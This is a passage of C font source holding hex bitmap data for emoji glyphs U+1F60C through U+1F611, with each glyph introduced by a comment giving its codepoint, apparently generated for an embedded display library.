0x0, 0x1f, 0xff, 0xf8, 0x1e, 0x1, 0xc0, 0x1e,
0x0, 0x1, 0xff, 0xe0, 0x6, 0x0, 0xe0, 0x7,
0x80, 0x0, 0x0, 0x38, 0x0, 0x0, 0x70, 0x1,
0xe0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x38, 0x0,
0x78, 0x0, 0x0, 0x3, 0x80, 0x0, 0x1c, 0x0,
0x1f, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x1c, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x38, 0x0, 0xe, 0x0,
0x0, 0xf8, 0x0, 0x0, 0xe, 0x0, 0xf, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x3, 0x80, 0x7, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0xf, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xfc, 0xf, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x87, 0xff, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0xfe, 0x0,
/* U+1F60C "😌" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x78, 0x0, 0x0, 0x3c,
0x0, 0xe0, 0xe, 0x0, 0xfc, 0x0, 0x0, 0x1f,
0x80, 0x38, 0xf, 0x1, 0xf0, 0x0, 0x0, 0x1,
0xf0, 0x1c, 0x7, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x3c, 0x7, 0x3, 0x81, 0xc0, 0x0, 0x0, 0x0,
0x7, 0x3, 0x83, 0x81, 0xc0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0xe1, 0xc0, 0x40, 0x0, 0x0, 0x0,
0x0, 0x40, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x20, 0x4, 0x0,
0x10, 0x2, 0x0, 0x3f, 0x0, 0x38, 0x7, 0x0,
0x1c, 0x3, 0x80, 0x1f, 0x80, 0xf, 0x7, 0x0,
0x7, 0x7, 0x80, 0xf, 0xc0, 0x3, 0xff, 0x0,
0x1, 0xff, 0x80, 0x7, 0xe0, 0x0, 0x7e, 0x0,
0x0, 0x3f, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x6, 0x0, 0x3, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x7, 0x80, 0x3, 0xc0, 0x0, 0x70, 0x7, 0x0,
0x1, 0xe0, 0x3, 0xc0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x3e, 0xf, 0x80, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x7, 0xff, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F60D "😍" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x6, 0x0, 0x0, 0x60,
0x0, 0xe0, 0xe, 0x0, 0xf, 0xc0, 0x1, 0xfc,
0x0, 0x38, 0xf, 0x0, 0xf, 0xf0, 0x0, 0xff,
0x0, 0x1c, 0x7, 0x7, 0xef, 0xfc, 0x0, 0xff,
0xdf, 0x87, 0x3, 0x8f, 0xff, 0xff, 0x0, 0xff,
0xff, 0xf3, 0x83, 0x87, 0xff, 0xff, 0x80, 0x7f,
0xff, 0xf8, 0xe1, 0xc7, 0xff, 0xff, 0xc0, 0x3f,
0xff, 0xfe, 0x71, 0xc3, 0xff, 0xff, 0xe0, 0x1f,
0xff, 0xff, 0x3c, 0xe1, 0xff, 0xff, 0xf0, 0xf,
0xff, 0xff, 0x8e, 0x70, 0xff, 0xff, 0xf8, 0x7,
0xff, 0xff, 0xc7, 0x38, 0x7f, 0xff, 0xf8, 0x1,
0xff, 0xff, 0xe3, 0xb8, 0x3f, 0xff, 0xfc, 0x0,
0xff, 0xff, 0xe0, 0xfc, 0xf, 0xff, 0xfe, 0x0,
0x7f, 0xff, 0xf0, 0x7e, 0x3, 0xff, 0xfe, 0x0,
0x1f, 0xff, 0xf0, 0x3f, 0x1, 0xff, 0xfe, 0x0,
0xf, 0xff, 0xf8, 0x1f, 0x80, 0x7f, 0xff, 0x0,
0x3, 0xff, 0xf8, 0xf, 0xc0, 0xf, 0xff, 0x0,
0x0, 0xff, 0xf0, 0x7, 0xe0, 0x3, 0xff, 0x0,
0x0, 0x3f, 0xf0, 0x3, 0xf0, 0x0, 0x7f, 0x0,
0x0, 0xf, 0xe0, 0x1, 0xf8, 0x0, 0x7, 0x0,
0x0, 0x3, 0x80, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x8, 0x0, 0x80, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x1f, 0x83, 0xf0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1f, 0xff, 0xfc, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0xf, 0xff, 0xfe, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x7, 0xff, 0xff, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x3, 0xff, 0xff, 0x80, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0xff, 0xff, 0x80, 0x0, 0x70, 0x7, 0x0,
0x0, 0x7f, 0xff, 0xc0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x1f, 0xff, 0xc0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x3, 0xff, 0x80, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x7f, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F60E "😎" */
0x0, 0x0, 0x0, 0xf, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xc0, 0x7, 0xf0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0xf, 0x80,
0x0, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x7, 0xff,
0xff, 0x0, 0x0, 0x7, 0xff, 0xff, 0xf3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc7, 0xff, 0xff, 0xff, 0xf3, 0xff, 0xff,
0xcf, 0xf0, 0xff, 0xff, 0xff, 0xfc, 0x7f, 0xff,
0xf1, 0xfe, 0x3f, 0xff, 0xf8, 0xff, 0x1f, 0xff,
0xfc, 0x3f, 0x8f, 0xff, 0xfe, 0xf, 0xe7, 0xff,
0xff, 0x87, 0xf3, 0xff, 0xff, 0x80, 0xf8, 0xff,
0xff, 0xf0, 0xfe, 0x7f, 0xff, 0xf0, 0x1f, 0x3f,
0xff, 0xff, 0x3f, 0xff, 0xff, 0xfc, 0x1, 0xff,
0xff, 0xff, 0xe7, 0xff, 0xff, 0xff, 0x80, 0x3f,
0xff, 0xff, 0xfc, 0xff, 0xff, 0xff, 0xf0, 0x7,
0xff, 0xff, 0xff, 0x9f, 0xff, 0xff, 0xfe, 0x0,
0x7f, 0xff, 0xff, 0xf3, 0xff, 0xff, 0xff, 0x80,
0xf, 0xff, 0xff, 0xfe, 0x7f, 0xff, 0xff, 0xf0,
0x1, 0xff, 0xff, 0xff, 0xcf, 0xff, 0xff, 0xfc,
0x0, 0x1f, 0xff, 0xff, 0xd9, 0xff, 0xff, 0xff,
0x80, 0x1, 0xff, 0xff, 0xfb, 0x3b, 0xff, 0xff,
0xe0, 0x0, 0x3f, 0xff, 0xfe, 0xe7, 0x3f, 0xff,
0xf8, 0x0, 0x3, 0xff, 0xff, 0x9c, 0x63, 0xff,
0xfc, 0x0, 0x0, 0x1f, 0xff, 0xe3, 0x8c, 0xf,
0xfe, 0x0, 0x0, 0x0, 0xff, 0xf0, 0x61, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x83,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc,
0xe, 0x0, 0x6, 0x0, 0x0, 0x3, 0x0, 0x3,
0x80, 0xc0, 0x1, 0xf0, 0x0, 0x1, 0xf0, 0x0,
0x70, 0x1c, 0x0, 0xf, 0x80, 0x0, 0xf8, 0x0,
0x1c, 0x1, 0x80, 0x0, 0x7e, 0x0, 0xfc, 0x0,
0x3, 0x80, 0x38, 0x0, 0x3, 0xff, 0xfe, 0x0,
0x0, 0xe0, 0x3, 0x80, 0x0, 0x7, 0xfe, 0x0,
0x0, 0x18, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x7,
0xc0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x3e, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x1, 0xf0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xe0, 0x3, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0, 0x0, 0x0,
/* U+1F60F "😏" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x3e, 0x0, 0x0, 0x0,
0x78, 0x3, 0x83, 0x80, 0x7f, 0x0, 0x0, 0x0,
0x3f, 0x80, 0xe1, 0xc0, 0xf8, 0x0, 0x0, 0x0,
0x3, 0xf0, 0x71, 0xc0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x3c, 0xe0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe, 0x70, 0x60, 0x0, 0x0, 0x0,
0x0, 0x1, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x7, 0xe0, 0x0,
0x0, 0xfc, 0x0, 0x3f, 0x0, 0x1f, 0xfc, 0x0,
0x3, 0xff, 0x80, 0x1f, 0x80, 0xf, 0xff, 0x0,
0x3, 0xff, 0xe0, 0xf, 0xc0, 0x4, 0x7f, 0x80,
0x0, 0x8f, 0xf0, 0x7, 0xe0, 0x0, 0x3f, 0xc0,
0x0, 0x7, 0xf8, 0x3, 0xf0, 0x0, 0x1f, 0xe0,
0x0, 0x3, 0xfc, 0x1, 0xf8, 0x0, 0x7, 0xe0,
0x0, 0x0, 0xfc, 0x0, 0xfc, 0x0, 0x1, 0xe0,
0x0, 0x0, 0x3c, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x30, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0xf8, 0x0, 0x38, 0x0, 0x38,
0x0, 0x3f, 0xff, 0xf8, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x1f, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F610 "😐" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0xf, 0x0, 0x0,
0x3c, 0x0, 0x7, 0x38, 0x0, 0xf, 0xc0, 0x0,
0x3f, 0x0, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x0, 0x3f, 0x0,
0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0xf, 0x0,
0x0, 0x3c, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x7,
0xff, 0xff, 0xff, 0xe0, 0x1, 0xc1, 0xc0, 0x3,
0xff, 0xff, 0xff, 0xf0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F611 "😑" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
